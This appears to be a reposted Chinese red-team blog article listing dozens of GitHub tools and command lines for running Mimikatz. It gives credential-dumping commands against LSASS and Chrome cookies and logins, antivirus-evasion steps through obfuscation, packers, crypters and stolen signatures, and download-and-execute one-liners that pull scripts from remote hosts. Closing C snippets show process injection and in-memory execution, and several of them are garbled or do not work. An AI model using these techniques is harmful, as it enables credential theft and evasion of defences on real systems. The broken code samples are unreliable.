红队|执行Mimikatz的64种方式
2023-4-16 21:2:50 Author: Z2O安全攻防(查看原文) 阅读量:24 收藏

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担。

文章正文

go-mimikatz

1
2
go build
./go-mimikatz

https://github.com/vyrus001/go-mimikatz

Rusty Mimikatz

1
2
cargo build --release
./target/release/mimikatz-rs

https://github.com/memN0ps/mimikatz-rs

MimikatzFUD

1
.\Invoke-M1m1fud2.ps1

https://github.com/HernanRodriguez1/MimikatzFUD

pypykatz

1
2
3
4
pip install -r requirements.txt
python pypykatz.py
python pypykatz.py lsa minidump -d ./lsass.dmp sekurlsa::logonpasswords
python pypykatz.py wmi "SELECT * FROM Win32_Process WHERE Name='lsass.exe'" sekurlsa::logonpasswords

https://github.com/skelsec/pypykatz

BetterSafetyKatz

1
2
3
4
.\BetterSafetyKatz.exe --DumpCreds
.\BetterSafetyKatz.exe --Minidump "C:\Windows\Temp\lsass.dmp" --DumpCreds
.\BetterSafetyKatz.exe --RemoteWMI -Target "192.168.1.100" -Username "domain\username" -Password "password123" --DumpCreds
.\BetterSafetyKatz.exe --RemoteSMB -Target "192.168.1.100" -Username "domain\username" -Password "password123" --DumpCreds

https://github.com/Flangvik/BetterSafetyKatz

CopyCat

1
2
3
4
.\CopyCat.exe --dump --local
.\CopyCat.exe --memory "C:\Windows\Temp\memdump.raw" --dump
.\CopyCat.exe --hibernation "C:\Windows\hiberfil.sys" --dump
.\CopyCat.exe --dump --target "192.168.1.100" --username "domain\username" --password "password123"

https://github.com/mobdk/CopyCat

PyFuscation

1
python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1

https://github.com/CBHue/PyFuscation

Invoke-Cats

1
2
3
Invoke-Cats -pwds 
Invoke-Cats -certs
Invoke-Cats -CustomCommand

https://github.com/DanMcInerney/Invoke-Cats

WinBoost

1
 csc.exe /platform:x64 /target:exe /unsafe winboost.cs

https://github.com/mobdk/WinBoost

mimidogz

1
.\Invoke-Mimidogz.ps1

https://github.com/fir3d0g/mimidogz

CoreClass

1
2
"Add" > "Existing Item". Navigate to the `CoreClass` directory and select all the `.cs` files.
Add a reference to `System.Management.Automation.dll` in your project. To do this, right-click on your project in the solution explorer and select "Add" > "Reference". In the "Reference Manager" window, select "Assemblies" and search for "System.Management.Automation". Select it and click "Add".

https://github.com/mobdk/CoreClass

SharpMimikatz

1
SharpMimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"

https://github.com/XTeam-Wing/SharpMimikatz

Invoke-Obfuscation

1
2
3
Set-ExecutionPolicy Unrestricted
Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation -ScriptPath C:\Path\To\MyScript.ps1 -Command All

https://github.com/danielbohannon/Invoke-Obfuscation

SimpleMimikatzObfuscator

1
Commands.txt

https://github.com/DimopoulosElias/SimpleMimikatzObfuscator

ClickOnceKatz

1
2
3
4
pip install pycryptodome requests
python build.py
Host the "publish" directory on a web server or file share accessible to the target machine.
On the target machine, navigate to the URL of the ClickOnce package in a web browser.

https://github.com/sinmygit/ClickOnceKatz

pymemimporter

1
2
3
4
5
6
7
8
9
10
11
12
import base64
import pymemimporter

# Load the base64-encoded module into memory
encoded_module = b'YOUR_BASE64_ENCODED_MODULE_HERE'
module_data = base64.b64decode(encoded_module)

# Import the module from memory
mem_importer = pymemimporter.PyMemImporter()
loaded_module = mem_importer.load_module('<module_name>', module_data)
base64 -w0 <module_name>.py > <module_name>.base64
python <script_name>.py

https://github.com/n1nj4sec/pymemimporter

SharpDPAPI

1
2
3
dotnet run --project .\SharpDPAPI\SharpDPAPI.csproj
dotnet run --project .\SharpDPAPI\SharpDPAPI.csproj masterkeys
dotnet run --project .\SharpDPAPI\SharpDPAPI.csproj domainbackupkeys

https://github.com/GhostPack/SharpDPAPI

Plog

1
2
3
privilege::debug

sekurlsa::Plog

https://github.com/GamehunterKaan/Plog

StegoKatz

1
2
.\StegoKatz.ps1 -Embed -FilePath <file_path> -ImagePath <image_path> -OutputPath <output_path>
.\StegoKatz.ps1 -Extract -ImagePath stego_image.jpg -OutputPath extracted_secret.txt

https://github.com/r13mann/StegoKatz

LoadMimikatzWithDinvoke.cs

1
2
mimi.bat
.\rundll32-hijack.ps1

https://github.com/farzinenddo/SeveralWaysToExecuteMimikatz/blob/main/LoadMimikatzWithDinvoke.cs

mimikatz-bypass

1
2
3
Invoke-WebRequest https://raw.githubusercontent.com/corneacristian/mimikatz-bypass/master/mimikatz-bypass.ps1 -OutFile mimikatz-bypass.ps1
Set-ExecutionPolicy Unrestricted
.\mimikatz-bypass.ps1

https://github.com/corneacristian/mimikatz-bypass

Utils

1
2
dotnet build -r win10-x64
katz.exe <MIMIKATZ_COMMAND>

https://github.com/ITh4cker/Utils

Eyeworm

1
2
python3 eyeworm.py -t <PAYLOAD_TYPE> -c <COMMAND> -o <OUTPUT_FILE>
python3 eyeworm.py -i <INPUT_FILE> -p <PAYLOAD_FILE> -o <OUTPUT_FILE>

https://github.com/imsellbaox/Eyeworm

drunkenkatz

1
beacon> execute-assembly /root/drunkencat.exe -i -g -k -c "python drunkenkatz.py"

https://github.com/ap3r/drunkenkatz

CallBack

1
python3 CallBack.py -i <LOCAL_IP_ADDRESS> -p <LOCAL_PORT>

https://github.com/mobdk/CallBack

mimikatz-byPass-Huorong

1
python mimikatz_byPass_Huorong.py

https://github.com/q1ya/mimikatz-byPass-Huorong

mimikatz_bypass

1
python mimikatz_bypass.py

https://github.com/wangfly-me/mimikatz_bypass

HTML-mimikatz-

1
cmd.exe mimikatz.html

https://github.com/vipserver/HTML-mimikatz-

Mimikatz.exe-in-JS

1
cmd.exe mimikatz.js

https://github.com/hardw00t/Mimikatz.exe-in-JS

-Have-You-Seen-These-Katz-

1
2
3
4
5
6
7
8
9
10
11
12
13
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1

sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1

sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1

sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1

sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1

sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1

sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1

https://github.com/Ninja-Tw1sT/-Have-You-Seen-These-Katz-

MimiRunner

1
rundll32 *.log,#1

https://github.com/mobdk/MimiRunner

Mimikatz-PE-Injection

1
2
3
4
5
6
7
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*

*** In the above command '/out:katz.exe katz.cs' the 'katz.cs' should be the path where initially powershell downloads the CS file ***

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe \\share_ip\share_name\katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*

cd %temp% && powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe %temp%\\katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* && move mimikatz.log %temp%\\katz.log && cd %temp% && del %temp%\\katz.cs

https://github.com/analyticsearch/Mimikatz-PE-Injection

ninifox

1
.\Invoke-NiNifox.ps1

https://github.com/scottjosh/ninifox

Chexport

1
2
3
4
5
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect`

`dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data For Account" /unprotect`

`dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

https://github.com/GamehunterKaan/Chexport

mimik

1
2
3
4
mimikatz.exe
mprotected.exe
mprotected.jpg.exe
mprotected.jpg.7z

https://github.com/MisterLobster22/mimik

my-obfuscated-mimikatz

1
eric.ps1

https://github.com/lazaars/my-obfuscated-mimikatz

Invoke-Mimikatz-W10

1
.\Invoke-Mimikatz.ps1

https://github.com/VDA-Labs/Invoke-Mimikatz-W10

MimiVader

1
python3 MimiVader.py Invoke-Mimikatz.ps1 DeceptiveFile.py

https://github.com/lawja/MimiVader

Invoke-Mimikatz

1
.\Invoke-Mimikatz

https://github.com/syn-ack-zack/Invoke-Mimikatz

Invoke-Mimikatz

1
.\invokemimikatz.ps1

https://github.com/dfirdeferred/Invoke-Mimikatz

mimikatz_bypass

1
2
.\XInvoke-Mimikatz.ps1
.\wi10_Invoke-Mimikatz.ps1

https://github.com/izj007/mimikatz_bypass

JS_MimiKatzDropper

1
cscript.exe dropper.js

https://github.com/leinn32/JS_MimiKatzDropper

mimicats

1
Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/Moon1705/mimicats/master/Mimicats.ps1') Invoke-Cats -Command '"privilege::debug"'

https://github.com/Moon1705/mimicats

XorPacker

1
python3 ./xorpacker.py -f mimikatz.exe -t UNMANAGED

https://github.com/tmenochet/XorPacker

PEzor

1
PEzor.sh -fluctuate=RW -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"coffee" "sleep 5000" "coffee" "exit"'

https://github.com/phra/PEzor

AtomPePacker

1
PePacker.exe mimikatz.exe -e

https://github.com/NUL0x4C/AtomPePacker

Nim-RunPE

1
nim c -d:args NimRunPE.nim

https://github.com/S3cur3Th1sSh1t/Nim-RunPE

Nimcrypt2

1
2
nim c -d:release nimcrypt2.nim
./nimcrypt2 --encrypt --keyfile=mykey.txt --inFile=plaintext.txt --outFile=ciphertext.txt

https://github.com/icyguider/Nimcrypt2

ProtectMyTooling

1
py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe

https://github.com/mgeeky/ProtectMyTooling

xencrypt

1
2
Import-Module ./xencrypt.ps1 
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1

https://github.com/the-xentropy/xencrypt

BetterXencrypt

1
2
Import-Module ./betterxencrypt.ps1 
Invoke-BetterXencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1

https://github.com/GetRektBoy724/BetterXencrypt

AES-Encoder

1
2
Invoke-AES-Encoder -InFile 
invoke-mimikatz.ps1 -OutFile aesmimi.ps1

https://github.com/Chainski/AES-Encoder

mortar

1
2
./encryptor -f mimikatz.exe -o bin.enc
deliver.exe -d -c sekurlsa::logonpasswords -f bin.enc

https://github.com/0xsp-SRD/mortar

.NET-Crypter

1
2
Browse Executable:
Generate Encryption:

https://github.com/roast247/.NET-Crypter

Custom mods + Invoke-Obfuscation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
sed
- e '/<#/,/#>/c\\' "$1"
sed
's/^[[: space: ]]*#.*$//g' "$1"
- e
sed
's/Invoke-Mimikatz/RainbowsAndUnicorns/g' "$1"
- e
T'T
sed
-e's/DumpCreds/MoreRainbows/g' "$1"
Invoke-Obfuscation -ScriptPath ‘./Invoke-Mimikatz.ps1’ -Command ‘Token\All\1\Out full_power.ps1’ -Quiet
Invoke-Obfuscation -ScriptPath '.\2.IM_critical_words.ps1' -Command ‘Token\Variable\1’ -Quiet > final.ps1
IEX (New-object Net. Webclient) .Downloadstring('http: //192.168.1.104:8000/final.ps1') ; RainbowsAndUnicorns -MoreRainbows

https://github.com/newlog/fud_mimikatz_talk

Obfuscated_Invoke-Mimikatz

1
2
3
4
5
6
7
8
sed -i -e 's/Invoke-Mimikatz/Invoke-LSASSscraper/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions
#\-/g" Invoke-Mimikatz.ps1
Install-Module -Name "ISESteroids" -Scope CurrentUser -Repository PSGallery –Force
Import-Module .\obfuscat_Invoke-Mimikatz.ps1
Invoke-LSASSscraper

https://github.com/VraiHack/Obfuscated_Invoke-Mimikatz

mimikatz_encoded

1
certutil -decode mimikatz_encoded.bin mimikatz.exe && mimikatz.exe "sekurlsa::logonPasswords full" exit

https://github.com/mobx26/mimikatz_encoded

Encrypted_Mimikatz

1
2
.\decrypt.ps1
.\mimikatz.exe "sekurlsa::logonPasswords full" exit

https://github.com/Sombody101/Encrypted_Mimikatz

SigThief

1
sigthief.py -i c: \Windows\System32\consent.exe -t mimikatz. exe -o MSCredentialTool.exe

https://github.com/secretsquirrel/SigThief

memory+suspended

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#include <stdio.h>
#include <windows.h>

const char* cmd = "powershell.exe -windowstyle hidden -command \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/gentilkiwi/mimikatz/master/mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\"";

void obfuscate(char* str)
{
int len = strlen(str);
for (int i = 0; i < len; i++) {
str[i] = str[i] ^ 0x41;
}
}

int main()
{
char* encoded_cmd = "YWxpY2UgY29tbWFuZCAtIHdpbmRvd3N0eWxlIGhpZGRlbjsgLWNvbW1hbmQgIklFWCAoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9yYXdAZ2VudGlsa2l3aS9taW1pa2F0ei9tZXRhZGF0YS9taW1pa2F0ei5wczEnKTsgSW52b2tlLU1pbWlrYXR6IC1EdW1wQ3JlZHMK\"";
obfuscate(encoded_cmd);

DWORD pid = GetCurrentProcessId();
HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (process == NULL) {
printf("Error opening process. Error code: %lu\n", GetLastError());
return 1;
}

LPVOID remote_string = VirtualAllocEx(process, NULL, strlen(encoded_cmd), MEM_COMMIT, PAGE_READWRITE);
if (remote_string == NULL) {
printf("Error allocating memory. Error code: %lu\n", GetLastError());
CloseHandle(process);
return 1;
}

BOOL write_result = WriteProcessMemory(process, remote_string, encoded_cmd, strlen(encoded_cmd), NULL);
if (!write_result) {
printf("Error writing to process memory. Error code: %lu\n", GetLastError());
CloseHandle(process);
return 1;
}

HANDLE thread = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, remote_string, 0, NULL);
if (thread == NULL) {
printf("Error creating remote thread. Error code: %lu\n", GetLastError());
CloseHandle(process);
return 1;
}

WaitForSingleObject(thread, INFINITE);

VirtualFreeEx(process, remote_string, strlen(encoded_cmd), MEM_RELEASE);
CloseHandle(process);

return 0;
}

XOR’d with 0xFF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#include <iostream>
#include <cstring>

using namespace std;

void obfuscate(char* s) {
for (int i = 0; s[i]; i++) {
s[i] = s[i] ^ 0xFF;
}
}

int main() {
char* str = new char[20];
strcpy(str, "password123");

// Obfuscate the string
obfuscate(str);

// Print the obfuscated string
cout << str << endl;

// Restore the original string
obfuscate(str);

// Print the original string
cout << str << endl;

delete[] str;

return 0;
}

XORing each character with the value 0xAA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main()
{
char str1[] = "mimikatz.exe";
char str2[] = "powershell.exe";
char str3[] = "cmd.exe /c mimikatz.exe";

int len1 = strlen(str1);
int len2 = strlen(str2);
int len3 = strlen(str3);

for(int i = 0; i < len1; i++) {
str1[i] = str1[i] ^ 0xAA;
}

for(int i = 0; i < len2; i++) {
str2[i] = str2[i] ^ 0xAA;
}

for(int i = 0; i < len3; i++) {
str3[i] = str3[i] ^ 0xAA;
}

void* mem = VirtualAlloc(NULL, sizeof(str1) + sizeof(str2) + sizeof(str3), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

memcpy(mem, str1, sizeof(str1));
memcpy((char*)mem + sizeof(str1), str2, sizeof(str2));
memcpy((char*)mem + sizeof(str1) + sizeof(str2), str3, sizeof(str3));

((void(*)())mem)();

return 0;
}

Decoding and storing it in memory

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include <iostream>
#include <windows.h>

int main()
{
const char* encodedCmd = "\x44\x43\x4D\x53\x63\x72\x61\x70\x00\x2D\x61\x20\x2D\x6E\x6F\x70\x62\x00\x2D\x6E\x6F\x70\x23\x00\x2D\x6E\x6F\x70\x69\x00\x2D\x61\x20\x2D\x6E\x6F\x70\x77\x00\x2D\x70\x00\x2D\x65\x00\x2D\x74\x00\x2D\x72\x00\x2D\x75\x00\x2D\x6E\x00\x20\x22\x26\x28\x2A\x2C\x2E\x30\x32\x34\x36\x38\x3A\x3C\x3E\x40\x42\x44\x46\x48\x4A\x4C\x4E\x50\x52\x54\x56\x58\x5A\x5C\x5E\x60\x62\x64\x66\x68\x6A\x6C\x6E\x70\x72\x74\x76\x78\x7A\x7C\x7E\x80\x82\x84\x86\x88\x8A\x8C\x8E\x90\x92\x94\x96\x98\x9A\x9C\x9E\xA0\xA2\xA4\xA6\xA8\xAA\xAC\xAE\xB0\xB2\xB4\xB6\xB8\xBA\xBC\xBE\xC0\xC2\xC4\xC6\xC8\xCA\xCC\xCE\xD0\xD2\xD4\xD6\xD8\xDA\xDC\xDE\xE0\xE2\xE4\xE6\xE8\xEA\xEC\xEE\xF0\xF2\xF4\xF6\xF8\xFA\xFC\xFE\x00\x22";

DWORD pid;
HWND hwnd = FindWindowA(NULL, "Window Name");
GetWindowThreadProcessId(hwnd, &pid);

HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

LPVOID allocSpace = VirtualAllocEx(hProc, NULL, strlen(encodedCmd), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

WriteProcessMemory(hProc, allocSpace, encodedCmd, strlen(encodedCmd), NULL);

HANDLE hThread = CreateRemoteThread(hProc, NULL, NULL, (LPTHREAD_START_ROUTINE)allocSpace, NULL, NULL, NULL);

CloseHandle(hThread);
CloseHandle(hProc);

return 0;
}

Inject and execute Mimikatz in memory

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MIMIKATZ_PATH "C:\\path\\to\\mimikatz.exe"

int main()
{
// Load Mimikatz into memory
HANDLE hFile = CreateFileA(MIMIKATZ_PATH, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
DWORD dwFileSize = GetFileSize(hFile, NULL);
BYTE* pbFileData = (BYTE*)malloc(dwFileSize);
DWORD dwBytesRead;
ReadFile(hFile, pbFileData, dwFileSize, &dwBytesRead, NULL);
CloseHandle(hFile);

// Allocate memory for Mimikatz
LPVOID lpMem = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

// Copy Mimikatz to allocated memory
memcpy(lpMem, pbFileData, dwFileSize);

// Execute Mimikatz
DWORD dwExitCode;
DWORD dwThreadId;
HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpMem, NULL, 0, &dwThreadId);
WaitForSingleObject(hThread, INFINITE);
GetExitCodeThread(hThread, &dwExitCode);

// Free allocated memory
VirtualFree(lpMem, 0, MEM_RELEASE);

return 0;
}

技术交流

知识星球

致力于红蓝对抗,实战攻防,星球不定时更新内外网攻防渗透技巧,以及最新学习研究成果等。常态化更新最新安全动态。专题更新奇技淫巧小Tips及实战案例。

涉及方向包括Web渗透、免杀绕过、内网攻防、代码审计、应急响应、云安全。星球中已发布 200+ 安全资源,针对网络安全成员的普遍水平,并为星友提供了教程、工具、POC&EXP以及各种学习笔记等等。

交流群

关注公众号回复“加群”,添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。

关注我们

关注福利:

回复“app" 获取  app渗透和app抓包教程

回复“渗透字典" 获取 针对一些字典重新划分处理,收集了几个密码管理字典生成器用来扩展更多字典的仓库。

回复“书籍" 获取 网络安全相关经典书籍电子版pdf

回复“资料" 获取 网络安全、渗透测试相关资料文档

往期文章

我是如何摸鱼到红队的

命令执行漏洞[无]回显[不]出网利用技巧

MSSQL提权全总结

Powershell 免杀过 defender 火绒,附自动化工具

一篇文章带你学会容器逃逸

域渗透 | kerberos认证及过程中产生的攻击

通过DCERPC和ntlmssp获取Windows远程主机信息


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247493917&idx=1&sn=4a52d05848083a26c590bed5f1869cab&chksm=ceab025df9dc8b4b27c69535bda58011c65b0b9d5cc39fef53230c7fe308cc85f10c2ed454e3#rd
如有侵权请联系:admin#unsafe.sh